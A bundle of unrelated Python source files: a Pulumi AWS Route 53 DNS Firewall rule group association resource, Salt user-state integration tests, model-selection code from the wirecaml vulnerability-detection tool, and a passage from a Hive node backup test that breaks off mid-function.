pulumi.set(__self__, "firewall_rule_group_id", firewall_rule_group_id)
pulumi.set(__self__, "priority", priority)
pulumi.set(__self__, "vpc_id", vpc_id)
if mutation_protection is not None:
pulumi.set(__self__, "mutation_protection", mutation_protection)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter(name="firewallRuleGroupId")
def firewall_rule_group_id(self) -> pulumi.Input[str]:
"""
The unique identifier of the firewall rule group.
"""
return pulumi.get(self, "firewall_rule_group_id")
@firewall_rule_group_id.setter
def firewall_rule_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "firewall_rule_group_id", value)
@property
@pulumi.getter
def priority(self) -> pulumi.Input[int]:
"""
The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: pulumi.Input[int]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Input[str]:
"""
The unique identifier of the VPC that you want to associate with the rule group.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vpc_id", value)
@property
@pulumi.getter(name="mutationProtection")
def mutation_protection(self) -> Optional[pulumi.Input[str]]:
"""
If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
"""
return pulumi.get(self, "mutation_protection")
@mutation_protection.setter
def mutation_protection(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mutation_protection", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A name that lets you identify the rule group association, to manage and use it.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider .
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@pulumi.input_type
class _ResolverFirewallRuleGroupAssociationState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
firewall_rule_group_id: Optional[pulumi.Input[str]] = None,
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
vpc_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ResolverFirewallRuleGroupAssociation resources.
:param pulumi.Input[str] arn: The ARN (Amazon Resource Name) of the firewall rule group association.
:param pulumi.Input[str] firewall_rule_group_id: The unique identifier of the firewall rule group.
:param pulumi.Input[str] mutation_protection: If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
:param pulumi.Input[str] name: A name that lets you identify the rule group association, to manage and use it.
:param pulumi.Input[int] priority: The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
:param pulumi.Input[str] vpc_id: The unique identifier of the VPC that you want to associate with the rule group.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if firewall_rule_group_id is not None:
pulumi.set(__self__, "firewall_rule_group_id", firewall_rule_group_id)
if mutation_protection is not None:
pulumi.set(__self__, "mutation_protection", mutation_protection)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
The ARN (Amazon Resource Name) of the firewall rule group association.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="firewallRuleGroupId")
def firewall_rule_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique identifier of the firewall rule group.
"""
return pulumi.get(self, "firewall_rule_group_id")
@firewall_rule_group_id.setter
def firewall_rule_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "firewall_rule_group_id", value)
@property
@pulumi.getter(name="mutationProtection")
def mutation_protection(self) -> Optional[pulumi.Input[str]]:
"""
If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
"""
return pulumi.get(self, "mutation_protection")
@mutation_protection.setter
def mutation_protection(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mutation_protection", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A name that lets you identify the rule group association, to manage and use it.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider .
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique identifier of the VPC that you want to associate with the rule group.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_id", value)
class ResolverFirewallRuleGroupAssociation(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
firewall_rule_group_id: Optional[pulumi.Input[str]] = None,
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Route 53 Resolver DNS Firewall rule group association resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example_resolver_firewall_rule_group = aws.route53.ResolverFirewallRuleGroup("exampleResolverFirewallRuleGroup")
example_resolver_firewall_rule_group_association = aws.route53.ResolverFirewallRuleGroupAssociation("exampleResolverFirewallRuleGroupAssociation",
firewall_rule_group_id=example_resolver_firewall_rule_group.id,
priority=100,
vpc_id=aws_vpc["example"]["id"])
```
## Import
Route 53 Resolver DNS Firewall rule group associations can be imported using the Route 53 Resolver DNS Firewall rule group association ID, e.g.
```sh
$ pulumi import aws:route53/resolverFirewallRuleGroupAssociation:ResolverFirewallRuleGroupAssociation example rslvr-frgassoc-0123456789abcdef
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] firewall_rule_group_id: The unique identifier of the firewall rule group.
:param pulumi.Input[str] mutation_protection: If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
:param pulumi.Input[str] name: A name that lets you identify the rule group association, to manage and use it.
:param pulumi.Input[int] priority: The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
:param pulumi.Input[str] vpc_id: The unique identifier of the VPC that you want to associate with the rule group.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ResolverFirewallRuleGroupAssociationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Route 53 Resolver DNS Firewall rule group association resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example_resolver_firewall_rule_group = aws.route53.ResolverFirewallRuleGroup("exampleResolverFirewallRuleGroup")
example_resolver_firewall_rule_group_association = aws.route53.ResolverFirewallRuleGroupAssociation("exampleResolverFirewallRuleGroupAssociation",
firewall_rule_group_id=example_resolver_firewall_rule_group.id,
priority=100,
vpc_id=aws_vpc["example"]["id"])
```
## Import
Route 53 Resolver DNS Firewall rule group associations can be imported using the Route 53 Resolver DNS Firewall rule group association ID, e.g.
```sh
$ pulumi import aws:route53/resolverFirewallRuleGroupAssociation:ResolverFirewallRuleGroupAssociation example rslvr-frgassoc-0123456789abcdef
```
:param str resource_name: The name of the resource.
:param ResolverFirewallRuleGroupAssociationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResolverFirewallRuleGroupAssociationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
firewall_rule_group_id: Optional[pulumi.Input[str]] = None,
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResolverFirewallRuleGroupAssociationArgs.__new__(ResolverFirewallRuleGroupAssociationArgs)
if firewall_rule_group_id is None and not opts.urn:
raise TypeError("Missing required property 'firewall_rule_group_id'")
__props__.__dict__["firewall_rule_group_id"] = firewall_rule_group_id
__props__.__dict__["mutation_protection"] = mutation_protection
__props__.__dict__["name"] = name
if priority is None and not opts.urn:
raise TypeError("Missing required property 'priority'")
__props__.__dict__["priority"] = priority
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
if vpc_id is None and not opts.urn:
raise TypeError("Missing required property 'vpc_id'")
__props__.__dict__["vpc_id"] = vpc_id
__props__.__dict__["arn"] = None
super(ResolverFirewallRuleGroupAssociation, __self__).__init__(
'aws:route53/resolverFirewallRuleGroupAssociation:ResolverFirewallRuleGroupAssociation',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
firewall_rule_group_id: Optional[pulumi.Input[str]] = None,
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
vpc_id: Optional[pulumi.Input[str]] = None) -> 'ResolverFirewallRuleGroupAssociation':
"""
Get an existing ResolverFirewallRuleGroupAssociation resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN (Amazon Resource Name) of the firewall rule group association.
:param pulumi.Input[str] firewall_rule_group_id: The unique identifier of the firewall rule group.
:param pulumi.Input[str] mutation_protection: If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
:param pulumi.Input[str] name: A name that lets you identify the rule group association, to manage and use it.
:param pulumi.Input[int] priority: The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
:param pulumi.Input[str] vpc_id: The unique identifier of the VPC that you want to associate with the rule group.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ResolverFirewallRuleGroupAssociationState.__new__(_ResolverFirewallRuleGroupAssociationState)
__props__.__dict__["arn"] = arn
__props__.__dict__["firewall_rule_group_id"] = firewall_rule_group_id
__props__.__dict__["mutation_protection"] = mutation_protection
__props__.__dict__["name"] = name
__props__.__dict__["priority"] = priority
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["vpc_id"] = vpc_id
return ResolverFirewallRuleGroupAssociation(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The ARN (Amazon Resource Name) of the firewall rule group association.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="firewallRuleGroupId")
def firewall_rule_group_id(self) -> pulumi.Output[str]:
"""
The unique identifier of the firewall rule group.
"""
return pulumi.get(self, "firewall_rule_group_id")
@property
@pulumi.getter(name="mutationProtection")
def mutation_protection(self) -> pulumi.Output[str]:
"""
If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
"""
return pulumi.get(self, "mutation_protection")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
A name that lets you identify the rule group association, to manage and use it.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def priority(self) -> pulumi.Output[int]:
"""
The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider .
"""
return pulumi.get(self, "tags_all")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Output[str]:
"""
The unique identifier of the VPC that you want to associate with the rule group.
"""
return pulumi.get(self, "vpc_id")
|
# -*- coding: utf-8 -*-
'''
tests for user state
user absent
user present
user present with custom homedir
'''
# Import python libs
from __future__ import absolute_import
import os
import grp
# Import Salt Testing libs
from salttesting import skipIf
from salttesting.helpers import (
destructiveTest,
ensure_in_syspath,
requires_system_grains
)
ensure_in_syspath('../../')
# Import salt libs
import salt.utils
import integration
class UserTest(integration.ModuleCase,
integration.SaltReturnAssertsMixIn):
'''
test for user absent
'''
def test_user_absent(self):
ret = self.run_state('user.absent', name='unpossible')
self.assertSaltTrueReturn(ret)
def test_user_if_present(self):
ret = self.run_state('user.present', name='nobody')
self.assertSaltTrueReturn(ret)
def test_user_if_present_with_gid(self):
if self.run_function('group.info', ['nobody']):
ret = self.run_state('user.present', name='nobody', gid='nobody')
elif self.run_function('group.info', ['nogroup']):
ret = self.run_state('user.present', name='nobody', gid='nogroup')
else:
self.skipTest(
'Neither \'nobody\' nor \'nogroup\' are valid groups'
)
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_not_present(self):
'''
This is a DESTRUCTIVE TEST it creates a new user on the minion.
And then destroys that user.
Assume that it will break any system you run it on.
'''
ret = self.run_state('user.present', name='salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_when_home_dir_does_not_18843(self):
'''
This is a DESTRUCTIVE TEST it creates a new user on the minion.
And then destroys that user.
Assume that it will break any system you run it on.
'''
HOMEDIR = '/home/home_of_salt_test'
ret = self.run_state('user.present', name='salt_test',
home=HOMEDIR)
self.assertSaltTrueReturn(ret)
self.run_function('file.absent', name=HOMEDIR)
ret = self.run_state('user.present', name='salt_test',
home=HOMEDIR)
self.assertSaltTrueReturn(ret)
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_nondefault(self):
'''
This is a DESTRUCTIVE TEST it creates a new user on the on the minion.
'''
ret = self.run_state('user.present', name='salt_test',
home='/var/lib/salt_test')
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir('/var/lib/salt_test'))
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
@requires_system_grains
def test_user_present_gid_from_name_default(self, grains=None):
'''
This is a DESTRUCTIVE TEST. It creates a new user on the on the minion.
This is an integration test. Not all systems will automatically create
a group of the same name as the user, but I don't have access to any.
If you run the test and it fails, please fix the code it's testing to
work on your operating system.
'''
# MacOS users' primary group defaults to staff (20), not the name of
# user
gid_from_name = False if grains['os_family'] == 'MacOS' else True
ret = self.run_state('user.present', name='salt_test',
gid_from_name=gid_from_name, home='/var/lib/salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_function('user.info', ['salt_test'])
self.assertReturnNonEmptySaltType(ret)
group_name = grp.getgrgid(ret['gid']).gr_name
self.assertTrue(os.path.isdir('/var/lib/salt_test'))
if grains['os_family'] in ('Suse',):
self.assertEqual(group_name, 'users')
elif grains['os_family'] == 'MacOS':
self.assertEqual(group_name, 'staff')
else:
self.assertEqual(group_name, 'salt_test')
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_gid_from_name(self):
'''
This is a DESTRUCTIVE TEST it creates a new user on the on the minion.
This is a unit test, NOT an integration test. We create a group of the
same name as the user beforehand, so it should all run smoothly.
'''
ret = self.run_state('group.present', name='salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_state('user.present', name='salt_test',
gid_from_name=True, home='/var/lib/salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_function('user.info', ['salt_test'])
self.assertReturnNonEmptySaltType(ret)
group_name = grp.getgrgid(ret['gid']).gr_name
self.assertTrue(os.path.isdir('/var/lib/salt_test'))
self.assertEqual(group_name, 'salt_test')
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
ret = self.run_state('group.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_gecos(self):
'''
This is a DESTRUCTIVE TEST it creates a new user on the on the minion.
It ensures that numeric GECOS data will be properly coerced to strings,
otherwise the state will fail because the GECOS fields are written as
strings (and show up in the user.info output as such). Thus the
comparison will fail, since '12345' != 12345.
'''
ret = self.run_state(
'user.present', name='salt_test', fullname=12345, roomnumber=123,
workphone=1234567890, homephone=1234567890
)
self.assertSaltTrueReturn(ret)
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
@destructiveTest
@skipIf(os.geteuid() != 0, 'you must be root to run this test')
def test_user_present_gecos_none_fields(self):
'''
This is a DESTRUCTIVE TEST it creates a new user on the on the minion.
It ensures that if no GECOS data is supplied, the fields will be coerced
into empty strings as opposed to the string "None".
'''
ret = self.run_state(
'user.present', name='salt_test', fullname=None, roomnumber=None,
workphone=None, homephone=None
)
self.assertSaltTrueReturn(ret)
ret = self.run_function('user.info', ['salt_test'])
self.assertReturnNonEmptySaltType(ret)
self.assertEqual('', ret['fullname'])
# MacOS does not supply the following GECOS fields
if not salt.utils.is_darwin():
self.assertEqual('', ret['roomnumber'])
self.assertEqual('', ret['workphone'])
self.assertEqual('', ret['homephone'])
ret = self.run_state('user.absent', name='salt_test')
self.assertSaltTrueReturn(ret)
if __name__ == '__main__':
from integration import run_tests
run_tests(UserTest)
|
import operator
import os
import itertools
from sklearn import svm
from sklearn import tree
from sklearn.dummy import DummyClassifier
from sklearn.ensemble import RandomForestClassifier, BaggingClassifier
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import BernoulliNB
from sklearn.tree import DecisionTreeClassifier
from wirecaml.analysis import metrics
from wirecaml.model.tan import TAN
from wirecaml.tools import config
from wirecaml.tools.ascii import print_notice, print_error
hyperparameters = {'DecisionTreeClassifier':
{'max_depth': [5, 15, 30, None],
'min_samples_leaf': [1, 2, 10, 50, 100],
'max_features': ['log2', 'sqrt', None],
'n_jobs': [-1],
'class_weight': ['balanced']},
'BernoulliNB': {
'alpha': [0.001, 0.003, 0.01, 0.03, 0.1, 1, 3, 10, 30, 100],
'binarize': [None]
},
'RandomForestClassifier':
{'n_estimators': [300, 500],
'max_depth': [5, 15, 30, None],
'min_samples_leaf': [1, 2, 10],
'max_features': ['log2', 'sqrt'],
'class_weight': ['balanced'],
'n_jobs': [-1]
},
'TAN': {'mbc': [''],
'score_type': ['BAYES']
},
'SVM':
{'C': [0.01, 0.1, 1, 10, 100],
'gamma': [0.0001, 0.01, 0.1, 1, 10, 100, 'auto'],
'kernel': ['rbf'],
'probability': [True],
'shrinking': [False],
'class_weight': ['balanced']
},
'LogisticRegression':
{'penalty': ['l1', 'l2'],
'C': [0.001, 0.01, 0.1, 1, 10, 100],
'class_weight': ['balanced'],
'n_jobs': [-1]
},
'DummyClassifier': {
'strategy': ['most_frequent', 'stratified', 'uniform']},
}
def create_model(model_type, params):
model = None
if model_type == "DecisionTreeClassifier":
model = DecisionTreeClassifier()
elif model_type == "BernoulliNB":
model = BernoulliNB()
elif model_type == "RandomForestClassifier":
model = RandomForestClassifier()
elif model_type == "TAN":
model = TAN()
elif model_type == "SVM":
model = svm.SVC()
elif model_type == "LogisticRegression":
model = LogisticRegression()
elif model_type == "DummyClassifier":
model = DummyClassifier()
if params is not None:
for parameter, value in params.items():
setattr(model, parameter, value)
if model_type == "SVM":
n_estimators = 10
# Because SVM is so slow, we use a bagging classifier to speed things up
model = BaggingClassifier(model, max_samples=1.0 / n_estimators, n_estimators=n_estimators, n_jobs=4)
return model
def select_model(language, vuln_type, X, Y):
model_type = config.get_str('model', 'Model')
params = config.get_dict('model', model_type + vuln_type + 'Params', optional=True)
model = create_model(model_type, params)
model.fit(X, Y)
if model_type == "DecisionTreeClassifier" and config.get_boolean('model', 'GenerateDecisionTreeGraph'):
create_dt_graph("%s_%s" % (language, vuln_type), model, X.columns.values)
return model
def select_best_model(X, Y, X_tuning, Y_tuning):
model_type = config.get_str('model', 'Model')
best_model_i = -1
best_auc_pr = -1
combinations = get_hyperparameter_combinations(model_type)
for i in range(len(combinations)):
print_notice("Generating model %d / %d with parameters: %s" % (1 + i, len(combinations), str(combinations[i])))
model = create_model(model_type, combinations[i])
model.fit(X, Y)
probas = model.predict_proba(X_tuning)
_, _, auc_pr = metrics.get_auc_score(Y_tuning, probas)
print_notice("Model %d has AUC-PR %.2f" % (1 + i, auc_pr))
if auc_pr > best_auc_pr:
best_model_i = i
best_auc_pr = auc_pr
print_notice("Model %d generated best AUC-PR (%.2f) with parameters: %s" % (1 + best_model_i, best_auc_pr,
str(combinations[best_model_i])))
def get_hyperparameter_combinations(model_type):
value_lists = []
parameters = []
combinations = []
for parameter, values in hyperparameters[model_type].items():
parameters.append(parameter)
value_lists.append(values)
# Get cartesian product of the hyperparameter values
for element in itertools.product(*value_lists):
combo = dict()
for i in range(len(element)):
combo[parameters[i]] = element[i]
combinations.append(combo)
return combinations
def select_features(X, Y):
k = config.get_int('model', 'kFeatures')
print_notice("Sorting features based on chi^2 (k=%d):" % k)
if k < 0 or k > len(X.columns):
print_error("k should be >= 0 and <= %d (n_features). Got %d." % (len(X.columns), k))
exit(-1)
skb = SelectKBest(chi2, k=k)
skb.fit_transform(X, Y)
support = skb.get_support()
n = 1
features = dict()
for col_name, score in zip(X.columns.values[support], skb.scores_[support]):
features[col_name] = score
for feature, score in sorted(features.items(), key=operator.itemgetter(1), reverse=True):
print_notice("%d. %s %.2f" % (n, feature, score))
n += 1
return X.columns.values[support]
def create_dt_graph(title, model, features):
graph_dir = config.get_str('model', 'DecisionTreeGraphDirectory')
dot_file = os.path.join(graph_dir, '%s.dot' % title)
png_file = os.path.join(graph_dir, '%s.png' % title)
print_notice("Creating Decision Tree graph in %s" % png_file)
# Write DOT file
tree.export_graphviz(model, out_file=dot_file, feature_names=features, filled=True, rounded=True, proportion=True,
node_ids=True)
# Convert DOT to PNG
os.system("dot -Tpng %s >%s" % (dot_file, png_file))
|
import json
import logging
import sys
import time
from io import BytesIO
from pathlib import Path
import requests
import unittest
from hive.main import view
from hive.main.hive_backup import HiveBackup
from hive.util.constants import INTER_BACKUP_FILE_URL, HIVE_MODE_TEST
from hive.util.error_code import NOT_FOUND
from tests_v1.hive_auth_test import DIDApp, DApp
from hive.util.did.eladid import ffi, lib
from src import create_app
logger = logging.getLogger()
logger.level = logging.DEBUG
class Hive2NodeTest(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(Hive2NodeTest, self).__init__(methodName)
@classmethod
def setUpClass(cls):
cls.stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(cls.stream_handler)
logging.getLogger("HiveBackupTestCase").debug("Setting up HiveBackupTestCase\n")
@classmethod
def tearDownClass(cls):
logging.getLogger("HiveBackupTestCase").debug("\n\nShutting down HiveBackupTestCase")
logger.removeHandler(cls.stream_handler)
def setUp(self):
logging.getLogger("HiveBackupTestCase").info("\n")
self.app = create_app(mode=HIVE_MODE_TEST)
self.app.config['TESTING'] = True
self.test_client = self.app.test_client()
self.app_id = "appid"
self.did = "did:elastos:ij8krAVRJitZKJmcCufoLHQjq7Mef3ZjTN"
self.user_did = DIDApp("didapp", "clever bless future fuel obvious black subject cake art pyramid member clump")
self.user_app_did = DApp("testapp", self.app_id,
"amount material swim purse swallow gate pride series cannon patient dentist person")
# self.host2 = "http://127.0.0.1:5000"
self.host1 = "http://127.0.0.1:5002"
self.host2 = "http://127.0.0.1:5003"
# self.docker_host1 = "http://host.docker.internal:5002"
# self.docker_host2 = "http://host.docker.internal:5003"
self.docker_host1 = "http://127.0.0.1:5002"
self.docker_host2 = "http://127.0.0.1:5003"
self.token1, self.hive_did1 = self.get_did_token(self.host1)
self.token2, self.hive_did2 = self.get_did_token(self.host2)
def json_header(self):
headers = {"Content-Type": "application/json"}
return headers
def auth_header(self, token):
headers = {"Content-Type": "application/json", "Authorization": "token " + token}
return headers
def upload_header(self, token):
headers = {"Authorization": "token " + token}
return headers
def tearDown(self):
logging.getLogger("HiveBackupTestCase").info("\n")
def assert200(self, status):
self.assertEqual(status, 200)
def parse_response(self, r):
try:
v = json.loads(r.get_data())
except json.JSONDecodeError:
v = None
return v, r.status_code
def did_auth(self, host, user_did, app_did):
# sign_in
doc = lib.DIDStore_LoadDID(app_did.store, app_did.did)
doc_str = ffi.string(lib.DIDDocument_ToJson(doc, True)).decode()
logging.getLogger("test_auth_common").debug(f"\ndoc_str: {doc_str}")
doc = json.loads(doc_str)
param = {"document": doc}
r = requests.post(host + '/api/v1/did/sign_in',
json=param,
headers=self.json_header())
self.assert200(r.status_code)
rt = r.json()
jwt = rt["challenge"]
